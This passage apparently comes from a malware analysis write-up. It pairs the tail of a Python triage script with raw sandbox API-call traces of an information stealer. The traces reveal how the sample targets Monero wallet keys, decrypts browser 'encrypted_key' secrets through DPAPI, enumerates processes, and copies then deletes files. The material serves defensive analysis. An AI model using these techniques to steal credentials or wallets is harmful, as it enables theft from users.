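  • Part of subcall function 00BE8CF0: GetSystemTime.KERNEL32(00BF0E1B,018BA148,00BF05B6,?,?,00BD13F9,?,0000001A,00BF0E1B,00000000,?,018B9000,?,\Monero\wallet.keys,00BF0E1A), ref: 00BE8D16
• CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00BDAA11
• lstrlen.KERNEL32(00000000,00000000), ref: 00BDAB2F
• lstrlen.KERNEL32(00000000), ref: 00BDADEC
  • Part of subcall function 00BEAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00BEAAF6
• DeleteFileA.KERNEL32(00000000), ref: 00BDAE73
Memory Dump Source
"""

if __name__ == "__main__":
    for hit in triage(REPORT_EXCERPT):
        print(f"CopyFileA at {hit['copy_ref']:08X}, DeleteFileA at "
              f"{hit['delete_ref']:08X}, paths seen: {hit['paths']}")
```

The "ref" addresses only approximate control flow: a backward jump or a loop would reorder the calls at run time, so a hit is a triage lead to confirm in the disassembly, not a verdict. Inherited ("Part of subcall function") calls are deliberately excluded from the CopyFileA/DeleteFileA match and used only to harvest path strings, otherwise every caller of the path-building helpers would light up.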
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                     • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AdjustPointer
                                    • String ID:
                                    • API String ID: 1740715915-0
                                    • Opcode ID: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                                    • Instruction ID: 4f88339c58c3cac235467a4c120949d0c79a250200520a1c9bae18294583363b
                                    • Opcode Fuzzy Hash: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                                    • Instruction Fuzzy Hash: 54510176A00206AFFB288F94C841BBA77E4FF41301F24452DEC1587691E731EE89EB90
                                    APIs
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 00BDA664
                                      • Part of subcall function 00BEAA50: lstrcpy.KERNEL32(00BF0E1A,00000000), ref: 00BEAA98
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                     • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocLocallstrcpy
                                    • String ID: @$v10$v20
                                    • API String ID: 2746078483-278772428
                                    • Opcode ID: 3f89f7ea8d12ab44798c07398685c87d00b2cd1566096de7e3a53fe09affca52
                                    • Instruction ID: d4bf9e2098cede9d7d10faa05b7b3133f4c7a7c55c78638cfa927abf4627f114
                                    • Opcode Fuzzy Hash: 3f89f7ea8d12ab44798c07398685c87d00b2cd1566096de7e3a53fe09affca52
                                    • Instruction Fuzzy Hash: 5B514A70A1024CEFDB14EFA8DD95FEDB7F9AF54304F008558E90A6B291EB706A04CB52
                                    APIs
                                      • Part of subcall function 00BEAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00BEAAF6
                                      • Part of subcall function 00BDA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BDA13C
                                      • Part of subcall function 00BDA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00BDA161
                                      • Part of subcall function 00BDA110: LocalAlloc.KERNEL32(00000040,?), ref: 00BDA181
                                      • Part of subcall function 00BDA110: ReadFile.KERNEL32(000000FF,?,00000000,00BD148F,00000000), ref: 00BDA1AA
                                      • Part of subcall function 00BDA110: LocalFree.KERNEL32(00BD148F), ref: 00BDA1E0
                                      • Part of subcall function 00BDA110: CloseHandle.KERNEL32(000000FF), ref: 00BDA1EA
                                      • Part of subcall function 00BE8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00BE8FE2
                                      • Part of subcall function 00BEAA50: lstrcpy.KERNEL32(00BF0E1A,00000000), ref: 00BEAA98
                                      • Part of subcall function 00BEACC0: lstrlen.KERNEL32(?,018B9000,?,\Monero\wallet.keys,00BF0E1A), ref: 00BEACD5
                                      • Part of subcall function 00BEACC0: lstrcpy.KERNEL32(00000000), ref: 00BEAD14
                                      • Part of subcall function 00BEACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00BEAD22
                                      • Part of subcall function 00BEABB0: lstrcpy.KERNEL32(?,00BF0E1A), ref: 00BEAC15
                                      • Part of subcall function 00BEAC30: lstrcpy.KERNEL32(00000000,?), ref: 00BEAC82
                                      • Part of subcall function 00BEAC30: lstrcat.KERNEL32(00000000), ref: 00BEAC92
                                    • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00BF1678,00BF0D93), ref: 00BDF64C
                                    • lstrlen.KERNEL32(00000000), ref: 00BDF66B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                     • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                    • String ID: ^userContextId=4294967295$moz-extension+++
                                    • API String ID: 998311485-3310892237
                                    • Opcode ID: 42590fdea5e78a3977f6ad28f57b5e23cbde27f90c2c0116ae9b63743f4b12d3
                                    • Instruction ID: 4cce96d0a74fe79e545dd38574bf89d142202fe2555fa5dd1ce3257444f3190d
                                    • Opcode Fuzzy Hash: 42590fdea5e78a3977f6ad28f57b5e23cbde27f90c2c0116ae9b63743f4b12d3
                                    • Instruction Fuzzy Hash: 2D511B72D00248AACB14FBB5DDA29FD77BDAF54300F4189A8F51667191EF347A08CB62
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                     • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen
                                    • String ID:
                                    • API String ID: 367037083-0
                                    • Opcode ID: 49debfd61d8e400dac7f808360e592771998df4f3e08bca02e2b7dbda7736a55
                                    • Instruction ID: e1c98fcf4e6f9a8f78ca3e2177f787608656d06b70c84c49a95d74f3bf82c111
                                    • Opcode Fuzzy Hash: 49debfd61d8e400dac7f808360e592771998df4f3e08bca02e2b7dbda7736a55
                                    • Instruction Fuzzy Hash: 37413075D102499BCB04EFA6D895AFEB7F8AF58704F008098F51677191EB74AA08CFA1
                                    APIs
                                      • Part of subcall function 00BEAA50: lstrcpy.KERNEL32(00BF0E1A,00000000), ref: 00BEAA98
                                      • Part of subcall function 00BDA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BDA13C
                                      • Part of subcall function 00BDA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00BDA161
                                      • Part of subcall function 00BDA110: LocalAlloc.KERNEL32(00000040,?), ref: 00BDA181
                                      • Part of subcall function 00BDA110: ReadFile.KERNEL32(000000FF,?,00000000,00BD148F,00000000), ref: 00BDA1AA
                                      • Part of subcall function 00BDA110: LocalFree.KERNEL32(00BD148F), ref: 00BDA1E0
                                      • Part of subcall function 00BDA110: CloseHandle.KERNEL32(000000FF), ref: 00BDA1EA
                                      • Part of subcall function 00BE8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00BE8FE2
                                    • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00BDA489
                                      • Part of subcall function 00BDA210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00BD4F3E,00000000,00000000), ref: 00BDA23F
                                      • Part of subcall function 00BDA210: LocalAlloc.KERNEL32(00000040,?,?,?,00BD4F3E,00000000,?), ref: 00BDA251
                                      • Part of subcall function 00BDA210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00BD4F3E,00000000,00000000), ref: 00BDA27A
                                      • Part of subcall function 00BDA210: LocalFree.KERNEL32(?,?,?,?,00BD4F3E,00000000,?), ref: 00BDA28F
                                      • Part of subcall function 00BDA2B0: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00BDA2D4
                                      • Part of subcall function 00BDA2B0: LocalAlloc.KERNEL32(00000040,00000000), ref: 00BDA2F3
                                      • Part of subcall function 00BDA2B0: LocalFree.KERNEL32(?), ref: 00BDA323
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                    • String ID: $"encrypted_key":"$DPAPI
                                    • API String ID: 2100535398-738592651
                                    • Opcode ID: fc1bd714d221c6a6b34a447eac788ff586d9274065fb3dc3ff636cf5dc016568
                                    • Instruction ID: 50b78748d00ffccc740b499d8dff89a7c8d0db7e2f59b46f86a1ee29655d53e9
                                    • Opcode Fuzzy Hash: fc1bd714d221c6a6b34a447eac788ff586d9274065fb3dc3ff636cf5dc016568
                                    • Instruction Fuzzy Hash: 2A3145B5D00509ABCF14EFE4EC45AEEB7F8AF68304F044599E505A3241F7359A04CBA2
                                    APIs
                                      • Part of subcall function 00BEAA50: lstrcpy.KERNEL32(00BF0E1A,00000000), ref: 00BEAA98
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00BF05BF), ref: 00BE885A
                                    • Process32First.KERNEL32(?,00000128), ref: 00BE886E
                                    • Process32Next.KERNEL32(?,00000128), ref: 00BE8883
                                      • Part of subcall function 00BEACC0: lstrlen.KERNEL32(?,018B9000,?,\Monero\wallet.keys,00BF0E1A), ref: 00BEACD5
                                      • Part of subcall function 00BEACC0: lstrcpy.KERNEL32(00000000), ref: 00BEAD14
                                      • Part of subcall function 00BEACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00BEAD22
                                      • Part of subcall function 00BEABB0: lstrcpy.KERNEL32(?,00BF0E1A), ref: 00BEAC15
                                    • CloseHandle.KERNEL32(?), ref: 00BE88F1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                    • String ID:
                                    • API String ID: 1066202413-0
                                    • Opcode ID: 4d2b048063d8b585fa6186e1a13909a3f57233a72884b22decfe4a3b48d3557d
                                    • Instruction ID: 6b9fa60c03269b6f77919d23e4939435aad3f7e358670471abe1685909954393
                                    • Opcode Fuzzy Hash: 4d2b048063d8b585fa6186e1a13909a3f57233a72884b22decfe4a3b48d3557d
                                    • Instruction Fuzzy Hash: BC312A71901258ABCB24EBA6CD51BEEB7BCEB55700F1041D9F50AA61A0DB306A48CFA1
                                    APIs
                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00C4FE13
                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00C4FE2C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Value___vcrt_
                                    • String ID:
                                    • API String ID: 1426506684-0
                                    • Opcode ID: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                    • Instruction ID: d4d17273738f71febbbc7619e70d0dac950a8aa8cc54320b859b4c95196b8895
                                    • Opcode Fuzzy Hash: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                    • Instruction Fuzzy Hash: AB01D436509721EEF73426B55CC9A6B3694FB417B7734433EF926801F2EF928C86A144
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00BF0DE8,00000000,?), ref: 00BE7B40
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00BE7B47
                                    • GetLocalTime.KERNEL32(?,?,?,?,?,00BF0DE8,00000000,?), ref: 00BE7B54
                                    • wsprintfA.USER32 ref: 00BE7B83
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateLocalProcessTimewsprintf
                                    • String ID:
                                    • API String ID: 377395780-0
                                    • Opcode ID: 1580b3fd961a99e8008f8a458b91177d4dc05a6fa98634f7c6cb496196a127db
                                    • Instruction ID: bcae99476230c73d87f84a939ac3e2b084a4b0a7249666fbf89abf9ab2a4c930
                                    • Opcode Fuzzy Hash: 1580b3fd961a99e8008f8a458b91177d4dc05a6fa98634f7c6cb496196a127db
                                    • Instruction Fuzzy Hash: 1A115AB2908118ABCB14DBCADD44BBFB7F8EB4DB11F00414AF645A2290E3395940C7B0
                                    APIs
                                    • CreateFileA.KERNEL32(00BE3D3E,80000000,00000003,00000000,00000003,00000080,00000000,?,00BE3D3E,?), ref: 00BE948C
                                    • GetFileSizeEx.KERNEL32(000000FF,00BE3D3E), ref: 00BE94A9
                                    • CloseHandle.KERNEL32(000000FF), ref: 00BE94B7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseCreateHandleSize
                                    • String ID:
                                    • API String ID: 1378416451-0
                                    • Opcode ID: 337d7ca29771dbf7a3a1bfee080bc57041030bd8fd7441537182f5be5f009f9d
                                    • Instruction ID: 8f4742986c0b38aedb91a83396b0961fe31e880ed0e47d905681f7a4595593a6
                                    • Opcode Fuzzy Hash: 337d7ca29771dbf7a3a1bfee080bc57041030bd8fd7441537182f5be5f009f9d
                                    • Instruction Fuzzy Hash: 40F03135E04208BFDB20DBB2DC49F5E77F9AB58710F108594FA51A72C0D674A6058B80
                                    APIs
                                    • __getptd.LIBCMT ref: 00BECA7E
                                      • Part of subcall function 00BEC2A0: __amsg_exit.LIBCMT ref: 00BEC2B0
                                    • __getptd.LIBCMT ref: 00BECA95
                                    • __amsg_exit.LIBCMT ref: 00BECAA3
                                    • __updatetlocinfoEx_nolock.LIBCMT ref: 00BECAC7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                    • String ID:
                                    • API String ID: 300741435-0
                                    • Opcode ID: de76f2b45dfd939fcee3fffca4641069e07e39e0cb45df82a6b466c1c4a79c8d
                                    • Instruction ID: d11d5a3fbb362ef787795977fe99f2071a3bc305028e436dda2c8fcbcea75f19
                                    • Opcode Fuzzy Hash: de76f2b45dfd939fcee3fffca4641069e07e39e0cb45df82a6b466c1c4a79c8d
                                    • Instruction Fuzzy Hash: B1F090329442989BD621FBAA9803B5F3FE0AF00724F1051D9F518AB1D6DF245D829A96
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Catch
                                    • String ID: MOC$RCC
                                    • API String ID: 78271584-2084237596
                                    • Opcode ID: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                                    • Instruction ID: 20ac198a38a017e9e97feec7c0c5861936864bc372292aa6c24f73cc28e90a18
                                    • Opcode Fuzzy Hash: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                                    • Instruction Fuzzy Hash: B9417875900209AFCF16DF98DC81AEEBBB5FF48301F288099FD14A6211E3359A94DF58
                                    APIs
                                      • Part of subcall function 00BE8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00BE8F9B
                                    • lstrcat.KERNEL32(?,00000000), ref: 00BE51CA
                                    • lstrcat.KERNEL32(?,00BF1058), ref: 00BE51E7
                                    • lstrcat.KERNEL32(?,018B8FC0), ref: 00BE51FB
                                    • lstrcat.KERNEL32(?,00BF105C), ref: 00BE520D
                                      • Part of subcall function 00BE4B60: wsprintfA.USER32 ref: 00BE4B7C
                                      • Part of subcall function 00BE4B60: FindFirstFileA.KERNEL32(?,?), ref: 00BE4B93
                                      • Part of subcall function 00BE4B60: StrCmpCA.SHLWAPI(?,00BF0FC4), ref: 00BE4BC1
                                      • Part of subcall function 00BE4B60: StrCmpCA.SHLWAPI(?,00BF0FC8), ref: 00BE4BD7
                                      • Part of subcall function 00BE4B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00BE4DCD
                                      • Part of subcall function 00BE4B60: FindClose.KERNEL32(000000FF), ref: 00BE4DE2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                    • String ID:
                                    • API String ID: 2667927680-0
                                    • Opcode ID: 441caf574b3e232b7e82d8bbaf120d94f30663302e9258f2b4f442c6b56ced0c
                                    • Instruction ID: 91f32f7fba7a0fd13ade9682b038bb7fb74ce601417523f66e3dddc3cc565e2e
                                    • Opcode Fuzzy Hash: 441caf574b3e232b7e82d8bbaf120d94f30663302e9258f2b4f442c6b56ced0c
                                    • Instruction Fuzzy Hash: 4021CDBAA00108AFC714FBB1EC42EED73BC9B59300F0045D4B655571A1EF74A6CC8B91